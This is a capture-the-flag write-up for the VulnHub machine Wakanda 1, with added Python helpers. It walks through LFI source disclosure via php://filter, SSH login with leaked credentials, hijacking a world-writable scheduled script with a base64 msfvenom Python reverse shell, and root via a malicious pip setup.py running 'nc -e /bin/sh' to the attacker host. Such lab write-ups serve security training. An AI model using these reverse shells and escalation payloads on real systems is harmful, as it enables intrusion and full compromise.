
Wakanda 1 - VulnHub CTF practice notes

☕ 8 min read · ✍️ IceKam

Environment:

Name: wakanda:1

Date: 5 August 2018

Author: xMagass

Series: wakanda

Description: A new Vibranium market will soon go live on the dark web. Your goal: obtain the root file that holds the exact location of the mine.

Level: intermediate

Flags: three flags (flag1.txt, flag2.txt, root.txt)

DHCP: enabled

IP address: assigned automatically

Hint: follow your instincts... and enumerate!

Information gathering

As usual, start with nmap (full TCP range, version and default-script detection) to enumerate the target's ports and services:

$ nmap -sC -sV -vv -p- 192.168.123.11
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-01 05:20 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:20
Completed NSE at 05:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:20
Completed NSE at 05:20, 0.00s elapsed
Initiating ARP Ping Scan at 05:20
Scanning 192.168.123.11 [1 port]
Completed ARP Ping Scan at 05:20, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:20
Completed Parallel DNS resolution of 1 host. at 05:20, 0.00s elapsed
Initiating SYN Stealth Scan at 05:20
Scanning Wakanda1.lan (192.168.123.11) [65535 ports]
Discovered open port 80/tcp on 192.168.123.11
Discovered open port 111/tcp on 192.168.123.11
Discovered open port 3333/tcp on 192.168.123.11
Discovered open port 33517/tcp on 192.168.123.11
Completed SYN Stealth Scan at 05:20, 1.88s elapsed (65535 total ports)
Initiating Service scan at 05:20
Scanning 4 services on Wakanda1.lan (192.168.123.11)
Completed Service scan at 05:21, 11.01s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.123.11.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.26s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.01s elapsed
Nmap scan report for Wakanda1.lan (192.168.123.11)
Host is up, received arp-response (0.00038s latency).
Scanned at 2018-11-01 05:20:52 CST for 13s
Not shown: 65531 closed ports
Reason: 65531 resets
PORT      STATE SERVICE REASON         VERSION
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          33517/tcp  status
|_  100024  1          46783/udp  status
3333/tcp  open  ssh     syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALuX0c3aQkbpbr2XkpVu/e9JzVTxIuE2JgFrg9680cM8EddLM+SYUh850nz9kGExllI1qOp0tlItrfju5z5LagpaQatQRuPGfGiOTDNA/22Fffwh/Akf/ifcm+O2+0A4jRvqmewJgGTnajhM/LVi8SN3hayQIJiCKjDWtvMr0qYHAAAAFQCiAX+fCFMJYDpIXmqS4GAoEF0PawAAAIBjo9/eh9Bt0BJQPOId7PfkV+gmz2ucqQWgtnBvPMQcY129Qo3v+wqfW3fPJnjao2Gw63piG4YbMG3t60zBwG/kS4U37yYx8dP2D3hMQ4J/8O9LlzuYaiZ07rbU47+9u42jd+YmLKIZVrHjNsOAVg7D4ssItg6X5+DrXOL0mXYB3AAAAIB9U1hqMz26a4Socu8/iKEN9JlxicoQona9U4TLLYvSEgZHLHACaAMH659WcAagNYmRTpPFAbAaAd5Igb0wCRhwpwbG1DzopHoI4pWu++TC9di8d+Z4cSnpJkHFXTJmK7XC/ULeTx2VSpvGCm+GRzFek3QUV8ggzOvCs9VDDDGbjQ==
|   2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRjfzpA+CV4EJgn9wbtHUFbmbqmhCDW4SbJHQrwKO5+RHMReBmxFepMfExiJbxhegI4EUIkGQY6vaXgOE7JQJk75JF1VDEcYTjiFyL/0uE5xn6yOLbge0h3JIsaq2OaWDQVLptJVecdzxRIFspqqxgBP8dOtbkLA9W/Zn2mHSZPmWXWE4aX6Zd1fdQjPRmp/KsAr0eTjIk8Q8uJDVWVgeGIKo2h+j2sfyiRwa4nnb06LaREJWF68gmOD6ZqxXdLUmQYrDMoRhXm19GdKawxuAKCOtMQzxO7uHMsO9gNWuZpojGRRWJixtAyKHNuNBjHgjqZPXiCVYj2SeWICKDj0a3
|   256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPsWvoFYGwdjNaS+s90Z2ypQ5CdYCn/Zpkd8+Ttj3ZtlcXbXLeRCw/m+tiWxr5LC/mEb/eASQNfrgz+GGxv9PLM=
|   256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPEZdWqHobn5ZGxrsRK+oIbr3qIHE8hDTporoVOz8pf2
33517/tcp open  status  syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:45:76:FD (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

  • Four ports are open: 80 (Apache 2.4.10), 111 (rpcbind), 3333 (OpenSSH 6.7p1 on a non-standard port) and 33517 (rpc.statd). Out of habit, we start with port 80.

Directory scanning

This time we use dirb; it is quick and convenient.

$ dirb http://192.168.123.11/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Nov  1 05:22:15 2018
URL_BASE: http://192.168.123.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.123.11/ ----
+ http://192.168.123.11/admin (CODE:200|SIZE:0)
+ http://192.168.123.11/backup (CODE:200|SIZE:0)
+ http://192.168.123.11/index.php (CODE:200|SIZE:1527)
+ http://192.168.123.11/secret (CODE:200|SIZE:0)
+ http://192.168.123.11/server-status (CODE:403|SIZE:302)
+ http://192.168.123.11/shell (CODE:200|SIZE:0)

-----------------
END_TIME: Thu Nov  1 05:22:17 2018
DOWNLOADED: 4612 - FOUND: 6
  • A handful of hits, but /admin, /backup, /secret and /shell all answer 200 with a zero-byte body (empty decoys) and /server-status is 403. Nothing usable here.

Reviewing the source

Opening http://192.168.123.11 shows no obvious foothold: no upload, no login, no registration. The page source, however, contains an interesting commented-out link.

<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
  • The ?lang=fr parameter looks like a possible entry point: a parameter that selects a file by name is the classic shape of a file inclusion bug.

File inclusion exploitation (LFI via php://filter)

Searching around and going on experience, this is very likely a file inclusion vulnerability, and testing in Burp Suite confirms it. The php://filter wrapper makes PHP base64-encode the target file instead of executing it, so we can read the application's own source. Note that the resource is given as index, not index.php: the server appends ".php" itself (visible once the source is decoded).

PoC

http://192.168.123.11/?lang=php://filter/convert.base64-encode/resource=index

Response

The body comes back as a single line of base64 (blob omitted here). Decoding it gives the source of index.php:


<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it

if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}

?>



<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="Vibranium market">
    <meta name="author" content="mamadou">

    <title>Vibranium Market</title>


    <link href="bootstrap.css" rel="stylesheet">


    <link href="cover.css" rel="stylesheet">
  </head>

  <body class="text-center">

    <div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
      <header class="masthead mb-auto">
        <div class="inner">
          <h3 class="masthead-brand">Vibranium Market</h3>
          <nav class="nav nav-masthead justify-content-center">
            <a class="nav-link active" href="#">Home</a>
            <!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
          </nav>
        </div>
      </header>

      <main role="main" class="inner cover">
        <h1 class="cover-heading">Coming soon</h1>
        <p class="lead">
          <?php
            if (isset($_GET['lang']))
          {
          echo $message;
          }
          else
          {
            ?>

            Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
            <?php
          }
?>
        </p>
        <p class="lead">
          <a href="#" class="btn btn-lg btn-secondary">Learn more</a>
        </p>
      </main>

      <footer class="mastfoot mt-auto">
        <div class="inner">
          <p>Made by<a href="#">@mamadou</a></p>
        </div>
      </footer>
    </div>



  

</body></html>

That reveals something useful.

  • Password: Niamey4Ever227!!! (hardcoded in index.php, with the comment "I have to remember it")
  • Username: mamadou (the author meta tag and the footer credit @mamadou)
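The php://filter read used against ?lang= above, as reusable code. This is an added example and not code from the original write-up: the vulnerable line is include($_GET['lang'].".php"), so the resource is named without its extension and the wrapper makes PHP emit the file as base64 instead of executing it. TARGET is the box IP from the write-up; SAMPLE_RESPONSE is constructed for the offline test; the function names and the allowlist fix at the end are this example's own.

```python
"""Added example, not part of the original write-up: the php://filter read
used against ?lang= on this box, as reusable code. The vulnerable line is
    include($_GET['lang'].".php");
so the resource is named without its extension (index, not index.php) and
the wrapper makes PHP base64-encode the file instead of executing it.
TARGET is the box IP from the write-up; SAMPLE_RESPONSE is constructed for
the offline test; function names are this example's own.
"""
import base64
import re
from urllib.parse import urlencode

TARGET = "http://192.168.123.11"


def filter_payload(resource: str) -> str:
    """php://filter wrapper: read `resource` (+ the server's ".php") as base64."""
    return f"php://filter/convert.base64-encode/resource={resource}"


def lfi_url(base: str, resource: str) -> str:
    """Full request URL; urlencode() percent-encodes the ':' and '/' in the wrapper."""
    return f"{base}/?{urlencode({'lang': filter_payload(resource)})}"


# A long run of base64 alphabet characters; the include() output lands inline
# with the rest of the HTML, so the body is never just the blob.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_leaked_source(html: str) -> str:
    """Pull the longest base64 run out of the response and decode it."""
    runs = B64_RE.findall(html)
    if not runs:
        raise ValueError("no base64 blob in response; the include probably failed")
    return base64.b64decode(max(runs, key=len)).decode("utf-8", errors="replace")


# PHP string literals assigned to variables, e.g.  $password ="..." ;
STRING_VAR_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')


def harvest_string_vars(php_source: str) -> dict:
    """Hardcoded string variables in the leaked source (where the password was)."""
    return dict(STRING_VAR_RE.findall(php_source))


ALLOWED_LANGS = {"en", "fr"}


def hardened_lang(param: str, default: str = "en") -> str:
    """The fix: map user input onto an allowlist instead of concatenating it
    into include(). Wrappers and traversal never reach the filesystem."""
    return param if param in ALLOWED_LANGS else default


# Constructed sample: a tiny PHP file whose base64 sits inside the page HTML,
# the way the real response did.
SAMPLE_PHP = '<?php\n$password ="Niamey4Ever227!!!" ;//I have to remember it\n?>\n'
SAMPLE_RESPONSE = (
    '<html><body><p class="lead">'
    + base64.b64encode(SAMPLE_PHP.encode()).decode()
    + "</p></body></html>"
)

if __name__ == "__main__":
    print(lfi_url(TARGET, "index"))
    leaked = decode_leaked_source(SAMPLE_RESPONSE)
    print(harvest_string_vars(leaked))  # {'password': 'Niamey4Ever227!!!'}
```

Swap "index" for any other PHP file under the web root (the ".php" is appended server-side, so never include it in the resource) to pull more source; decode_leaked_source() raises rather than returning garbage when the include fails and no blob is present.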

Getting the first flag

Try the credentials over SSH (remember it listens on 3333, not 22).

$ ssh [email protected] -p 3333
[email protected]'s password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 31 17:40:36 2018 from 192.168.123.122
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
  • The login lands in a Python REPL rather than a shell: the account's login shell is /usr/bin/python (confirmed below in /etc/passwd), which is a nuisance but not a barrier.

Spawn bash from the REPL with the pty module and grab the first flag.

>>> import pty
>>> pty.spawn('/bin/bash')
mamadou@Wakanda1:~$ ls
flag1.txt
mamadou@Wakanda1:~$ cat flag1.txt

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc

Privilege escalation

System information gathering

mamadou@Wakanda1:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
avahi-autoipd:x:107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mamadou:x:1000:1000:Mamadou,,,,Developper:/home/mamadou:/usr/bin/python
devops:x:1001:1002:,,,:/home/devops:/bin/bash
  • Two real accounts: mamadou (login shell /usr/bin/python, which explains the REPL) and devops (uid 1001, login shell /bin/bash). devops is the next target.

The second user

Move to the home directories and check what is readable or writable.

mamadou@Wakanda1:/home$ cd /home
mamadou@Wakanda1:/home$ ls
devops  mamadou
mamadou@Wakanda1:/home$ ls -la
total 16
drwxr-xr-x  4 root    root      4096 Aug  1 15:23 .
drwxr-xr-x 22 root    root      4096 Aug  1 13:05 ..
drwxr-xr-x  2 devops  developer 4096 Aug  5 02:25 devops
drwxr-xr-x  2 mamadou mamadou   4096 Oct 23 11:28 mamadou
mamadou@Wakanda1:/home$ cd devops/
mamadou@Wakanda1:/home/devops$ ls -la
total 24
drwxr-xr-x 2 devops developer 4096 Aug  5 02:25 .
drwxr-xr-x 4 root   root      4096 Aug  1 15:23 ..
lrwxrwxrwx 1 root   root         9 Aug  5 02:25 .bash_history -> /dev/null
-rw-r--r-- 1 devops developer  220 Aug  1 15:23 .bash_logout
-rw-r--r-- 1 devops developer 3515 Aug  1 15:23 .bashrc
-rw-r--r-- 1 devops developer  675 Aug  1 15:23 .profile
-rw-r----- 1 devops developer   42 Aug  1 15:57 flag2.txt
mamadou@Wakanda1:/home/devops$ cat flag2.txt
cat: flag2.txt: Permission denied
  • flag2.txt is there but unreadable: mode -rw-r-----, owner devops, group developer, and mamadou is in neither.

Find every file owned by devops

mamadou@Wakanda1:/home/devops$ find / -user devops 2>/dev/null
/srv/.antivirus.py
/home/devops
/home/devops/.bashrc
/home/devops/.profile
/home/devops/.bash_logout
/home/devops/flag2.txt
  • Besides the home directory, devops owns one file outside it: /srv/.antivirus.py.

Inspect the directory and the file.

mamadou@Wakanda1:/home/devops$ cd /srv/
mamadou@Wakanda1:/srv$ ls -la
total 12
drwxr-xr-x  2 root   root      4096 Aug  1 17:52 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
-rw-r--rw-  1 devops developer  256 Oct 23 11:28 .antivirus.py
mamadou@Wakanda1:/srv$ cat .antivirus.py

open('/tmp/test','w').write('test')
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.122",1))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
  • .antivirus.py is world-writable (-rw-r--rw-, owned by devops:developer) and is run on a schedule as devops; its content is a Python reverse shell, and the connect-back address 192.168.1.122 is not ours, so a previous player already used it. Whatever we put in this file will be executed as devops.
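The condition that made /srv/.antivirus.py exploitable (a file owned by another user, run on their behalf, that we can write to) is worth turning into a repeatable check. The following is an added example, not code from the write-up: parse_ls_la()/writable_by_others() run offline over captured `ls -la` text (the two listings embedded below are the ones shown on the page), and find_writable_foreign_files() does the same against a live filesystem with os.lstat. Function names are this example's own.

```python
"""Added example, not code from the original write-up: find files that belong
to another user but that the current user can modify. That is the condition
that made /srv/.antivirus.py exploitable here (owned by devops, run on a
schedule, mode -rw-r--rw- i.e. world-writable). Two entry points:
parse_ls_la()/writable_by_others() work on captured `ls -la` text so the
check can run offline on a pasted listing; find_writable_foreign_files()
does the same against the live filesystem with os.lstat. Function names are
this example's own, not anything on the box.
"""
import os
import stat
from dataclasses import dataclass


@dataclass
class Entry:
    mode: str    # e.g. "-rw-r--rw-"
    owner: str
    group: str
    name: str


def parse_ls_la(text: str):
    """Parse `ls -la` output. Skips the 'total' line and the . / .. entries.
    maxsplit=8 keeps names with spaces (and 'link -> target') intact."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) < 9 or parts[0].startswith("total"):
            continue
        mode, _links, owner, group, _size, _mon, _day, _time, name = parts
        if name in (".", ".."):
            continue
        entries.append(Entry(mode, owner, group, name))
    return entries


def is_world_writable(mode: str) -> bool:
    """'other' write bit is the 9th permission character (index 8)."""
    return len(mode) == 10 and mode[0] == "-" and mode[8] == "w"


def writable_by_others(entries, me: str, my_groups=()):
    """Regular files not owned by `me` that `me` can write, either through the
    world-write bit or through a group `me` belongs to."""
    hits = []
    for e in entries:
        if e.owner == me or e.mode[:1] != "-":
            continue  # skip our own files, directories and symlinks
        group_write = e.group in my_groups and e.mode[5] == "w"
        if is_world_writable(e.mode) or group_write:
            hits.append(e.name)
    return hits


def find_writable_foreign_files(root: str):
    """Live equivalent of `find root -type f ! -user $(id -u) -writable`,
    using lstat so symlinks are not followed."""
    uid = os.getuid()
    my_groups = set(os.getgroups())
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            path = os.path.join(dirpath, f)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or st.st_uid == uid:
                continue
            if st.st_mode & stat.S_IWOTH or (st.st_gid in my_groups and st.st_mode & stat.S_IWGRP):
                hits.append(path)
    return hits


# Listings as captured on the box in the write-up (reproduced here as test input).
SRV_LISTING = """total 12
drwxr-xr-x  2 root   root      4096 Aug  1 17:52 .
drwxr-xr-x 22 root   root      4096 Aug  1 13:05 ..
-rw-r--rw-  1 devops developer  256 Oct 23 11:28 .antivirus.py
"""
DEVOPS_HOME_LISTING = """total 24
drwxr-xr-x 2 devops developer 4096 Aug  5 02:25 .
drwxr-xr-x 4 root   root      4096 Aug  1 15:23 ..
lrwxrwxrwx 1 root   root         9 Aug  5 02:25 .bash_history -> /dev/null
-rw-r--r-- 1 devops developer  220 Aug  1 15:23 .bash_logout
-rw-r----- 1 devops developer   42 Aug  1 15:57 flag2.txt
"""

if __name__ == "__main__":
    print(writable_by_others(parse_ls_la(SRV_LISTING), "mamadou"))          # ['.antivirus.py']
    print(writable_by_others(parse_ls_la(DEVOPS_HOME_LISTING), "mamadou"))  # []
```

On the box itself, find_writable_foreign_files("/") is the same idea as `find / -user devops 2>/dev/null` followed by a permissions check, but it also catches files owned by any other user, not just the one you already suspect.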

Reverse shell

To save time, generate the payload with msfvenom.

Start an nc listener:

$ nc -vlp 2733

Generate the payload

$ msfvenom -p cmd/unix/reverse_python lhost=192.168.123.122 lport=2733 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 497 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsICAgc3VicHJvY2VzcyAgICAsICAgb3MgICAgICA7ICBob3N0PSIxOTIuMTY4LjEyMy4xMjIiICAgICAgOyAgcG9ydD0yNzMzICAgICAgOyAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgcy5jb25uZWN0KChob3N0ICAgICwgICBwb3J0KSkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgIDApICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAxKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAgMikgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"

Write the Python one-liner (without the python -c wrapper, since the file is already run by Python) into .antivirus.py:

exec('aW1wb3J0IHNvY2tldCAgICAsICAgc3VicHJvY2VzcyAgICAsICAgb3MgICAgICA7ICBob3N0PSIxOTIuMTY4LjEyMy4xMjIiICAgICAgOyAgcG9ydD0yNzMzICAgICAgOyAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgcy5jb25uZWN0KChob3N0ICAgICwgICBwb3J0KSkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgIDApICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAxKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAgMikgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))

  • Wait for the next scheduled run and the shell connects back to the listener.

Upgrade to an interactive bash shell

connect to [192.168.123.122] from (UNKNOWN) [192.168.123.11] 52448
python -c 'import pty; pty.spawn("/bin/sh")'
$ /bin/bash
/bin/bash
devops@Wakanda1:/$

Getting the second flag

devops@Wakanda1:/home$ cd devops
cd devops
devops@Wakanda1:~$ ls
ls
flag2.txt
devops@Wakanda1:~$ cat flag2.txt
cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098

  • Still not root. A bit of searching shows pip can be abused for privilege escalation: when sudo permits /usr/bin/pip (check with sudo -l), `pip install` on a local directory executes that package's setup.py as root.
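The check a practitioner would run before reaching for FakePip is `sudo -l`. The following is an added example and not code from the write-up: it parses `sudo -l` output and flags rules that amount to root, such as /usr/bin/pip (whose `install` runs setup.py as the invoking user). The page does not show this box's real `sudo -l`, so SAMPLE_SUDO_L is constructed; the binary list and function names are this example's own.

```python
"""Added example, not part of the original write-up: parse `sudo -l` output
and flag rules that are effectively root. The box is escalated with
`sudo /usr/bin/pip install .`, which executes the local package's setup.py as
root; a rule like that is what this check is meant to surface. The page does
not show the box's real `sudo -l`, so SAMPLE_SUDO_L below is constructed.
"""
import os
import re

# Binaries for which "may run as root" means arbitrary code as root.
# Non-exhaustive; pip is the one relevant to this box (setup.py hook),
# the rest are well-known interpreter / editor / pager escapes.
CODE_EXEC_BINARIES = {
    "pip", "pip2", "pip3", "python", "python2", "python3", "perl", "ruby",
    "bash", "sh", "vim", "vi", "less", "more", "find", "env", "awk",
}

# One rule line looks like:  (root) NOPASSWD: /usr/bin/pip, /usr/bin/apt-get
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text: str):
    """Return (runas, nopasswd, command) tuples for every rule in `sudo -l` output.
    Header lines ('Matching Defaults...', 'User x may run...') do not start
    with '(' and are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas").strip(), nopasswd, cmd.strip()))
    return rules


def dangerous_rules(rules):
    """Rules that give a shell as the run-as user: ALL, or a code-executing binary."""
    hits = []
    for runas, nopasswd, cmd in rules:
        if cmd == "ALL":
            hits.append((cmd, runas, "unrestricted"))
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in CODE_EXEC_BINARIES:
            if binary.startswith("pip"):
                reason = "pip install <dir> runs setup.py as the sudo target user"
            else:
                reason = "interpreter / editor / pager escape to a shell"
            hits.append((cmd, runas, reason))
    return hits


# Constructed sample; the write-up does not show the real output.
SAMPLE_SUDO_L = """Matching Defaults entries for devops on Wakanda1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User devops may run the following commands on Wakanda1:
    (ALL) NOPASSWD: /usr/bin/pip
    (root) /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for cmd, runas, why in dangerous_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[!] ({runas}) {cmd}: {why}")
```

Pipe real output into it with `sudo -l | python3 check_sudo.py` after swapping SAMPLE_SUDO_L for sys.stdin.read(); a rule on a pinned command with fixed arguments (like the apt-get line) is not flagged, because the escape depends on controlling what the binary runs.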

pip privilege escalation

Reference: https://github.com/0x00-0x00/FakePip

Change the payload (setup.py) to the following. The CustomInstall hook fires when pip executes setup.py, so under sudo the nc callback runs as root:

from setuptools import setup
from setuptools.command.install import install
import os

class CustomInstall(install):
    def run(self):
        install.run(self)
        os.system('nc -e /bin/sh 192.168.123.122 8443')

setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install':CustomInstall})

Running the payload

Start a web server on the attacker box to serve setup.py:

python -m SimpleHTTPServer 8033

Download it on the target as the second user (into a scratch directory, /tmp/fakepip):

devops@Wakanda1:/tmp/fakepip$ wget http://192.168.123.122:8033/setup.py
wget http://192.168.123.122:8033/setup.py
--2018-10-31 19:19:37--  http://192.168.123.122:8033/setup.py
Connecting to 192.168.123.122:8033... connected.
HTTP request sent, awaiting response... 200 OK
Length: 552 [text/plain]
Saving to: ‘setup.py’

setup.py            100%[=====================>]     552  --.-KB/s   in 0s

Start an nc listener on 8443:

nc -vlp 8443

Run it on the target (the --force-reinstall makes pip build from the local directory even if a package of that name is already present):
devops@Wakanda1:/tmp/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall

Getting the third flag

$ nc -vlp 8443
listening on [any] 8443 ...
192.168.123.11: inverse host lookup failed: Unknown host
connect to [192.168.123.122] from (UNKNOWN) [192.168.123.11] 51766
python -c 'import pty;pty.spawn("/bin/bash");'
root@Wakanda1:/tmp/pip-OWieiY-build# cd /root
cd /root
root@Wakanda1:~# ls -la
ls -la
total 24
drwx------  3 root root 4096 Oct 31 19:02 .
drwxr-xr-x 22 root root 4096 Aug  1 13:05 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  2 root root 4096 Oct 31 19:02 .pip
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r-----  1 root root  429 Aug  1 15:16 root.txt
root@Wakanda1:~# cat root.txt
cat root.txt
 _    _.--.____.--._
( )=.-":;:;:;;':;:;:;"-._
 \\\:;:;:;:;:;;:;::;:;:;:\
  \\\:;:;:;:;:;;:;:;:;:;:;\
   \\\:;::;:;:;:;:;::;:;:;:\
    \\\:;:;:;:;:;;:;::;:;:;:\
     \\\:;::;:;:;:;:;::;:;:;:\
      \\\;;:;:_:--:_:_:--:_;:;\
       \\\_.-"             "-._\
        \\
         \\
          \\
           \\ Wakanda 1 - by @xMagass
            \\
             \\


Congratulations You are Root!

821ae63dbe0c573eff8b69d451fb21bc

Takeaways

A great box; I picked up a new privilege-escalation technique from it.


Author: IceKam (icekam), self-styled tea-tasting expert and low-end writer.